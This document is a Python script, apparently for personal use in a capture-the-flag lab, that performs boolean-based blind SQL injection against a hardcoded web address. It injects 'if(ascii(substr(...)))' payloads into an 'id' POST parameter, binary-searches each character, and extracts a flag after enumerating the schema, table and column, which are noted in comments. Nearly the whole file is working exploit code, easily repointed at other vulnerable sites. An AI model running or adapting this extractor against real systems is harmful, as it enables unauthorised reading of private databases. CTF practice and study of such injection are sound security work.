sqli盲注自用脚本
盲注脚本
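# -*- coding:utf-8 -*-
"""Boolean-based blind SQL injection extractor for a CTF lab target.

The ``id`` POST parameter is injected with
``1' and if(ascii(substr(<expr>,<pos>,1))><n>,1,0)#``.  When the condition
holds, the page renders a grade row whose ``<td>`` cells contain ``60``;
when it does not, that marker is absent.  That presence/absence is the
one-bit oracle the helpers below drive.

Changes versus the original one-liner:
  * binary search per character (about 8 requests) instead of a linear scan
    of ASCII 32..128 (up to 97 requests);
  * stop at the end of the data: MySQL's ``ascii('')`` is 0, which the old
    ``>`` scan turned into ``chr(32)`` and appended as padding spaces for
    every remaining position;
  * a request timeout and a transport-error check, so a hung connection or
    an HTTP error is reported instead of being silently read as "false".

Only run this against systems you are authorised to test.
"""
import re

URL = "http://123.206.87.240:8002/chengjidan/index.php"

# MySQL if(cond, a, b): returns a when cond is true, b otherwise.
BASE_PAYLOAD = "1' and if(ascii(substr({data},{pos},1))>{number},1,0)#"

# Expressions used in the earlier steps of the same extraction chain, kept
# for reference (results as recorded by the original author):
#   "database()"                                                  -> schema: skctf_flag
#   "(select table_name from information_schema.tables"
#   " where table_schema=database() limit 0,1)"                   -> table:  fl4g
#   "(select column_name from information_schema.columns"
#   " where table_name='fl4g' limit 0,1)"                         -> column: skctf_flag
PAYLOAD = "(select skctf_flag from fl4g limit 0,1)"  # the data itself

MAX_LEN = 50        # assumed upper bound on the length of the extracted value
TIMEOUT = 10        # seconds per request; the original had none and could hang forever
TRUE_MARKER = "60"  # substring present only in the "condition true" page (lab-specific)
TD_RE = re.compile(r"<td>(.+?)<td>")


def build_payload(data, pos, number):
    """Return the injected ``id`` value asking whether ascii(substr(data,pos,1)) > number.

    ``data`` is a SQL expression (not user input -- this script is the attacker),
    ``pos`` is 1-based as in MySQL substr().
    """
    return BASE_PAYLOAD.format(data=data, pos=pos, number=number)


def page_says_true(html):
    """Decode the oracle bit from a response body.

    Joins every ``<td>`` cell matched by TD_RE and looks for TRUE_MARKER.
    Its absence is taken as "condition false", so an empty or broken page
    also reads as false -- callers must verify the request itself succeeded.
    """
    cells = TD_RE.findall(html)
    return TRUE_MARKER in "".join(cells)


def extract_char_code(probe, pos, hi=255):
    """Binary-search the byte value at 1-based position ``pos``.

    ``probe(pos, number)`` must return True iff ascii(substr(data,pos,1)) > number.
    The value is assumed to lie in [0, hi]; MySQL ascii() yields 0..255, and
    0 means ``pos`` is past the end of the data (ascii('') == 0).
    """
    lo = 0
    while lo < hi:
        mid = (lo + hi) // 2
        if probe(pos, mid):
            lo = mid + 1  # value > mid
        else:
            hi = mid      # value <= mid
    return lo


def extract_string(probe, max_len=MAX_LEN):
    """Extract up to ``max_len`` characters, stopping at the first 0 (end of data).

    ``probe`` has the same contract as in :func:`extract_char_code`.
    """
    chars = []
    for pos in range(1, max_len + 1):
        code = extract_char_code(probe, pos)
        if code == 0:
            break
        chars.append(chr(code))
    return "".join(chars)


def main():
    # Imported here so the pure helpers above stay importable (and testable)
    # without the third-party dependency or any network access.
    import requests

    session = requests.Session()

    def probe(pos, number):
        resp = session.post(
            URL,
            data={"id": build_payload(PAYLOAD, pos, number)},
            timeout=TIMEOUT,
        )
        # Fail loudly: an HTTP error silently read as "false" would corrupt
        # the extracted value.  If this lab answers the false branch with a
        # non-2xx status, relax this check rather than remove the timeout.
        resp.raise_for_status()
        return page_says_true(resp.text)

    print(extract_string(probe))


if __name__ == "__main__":
    main()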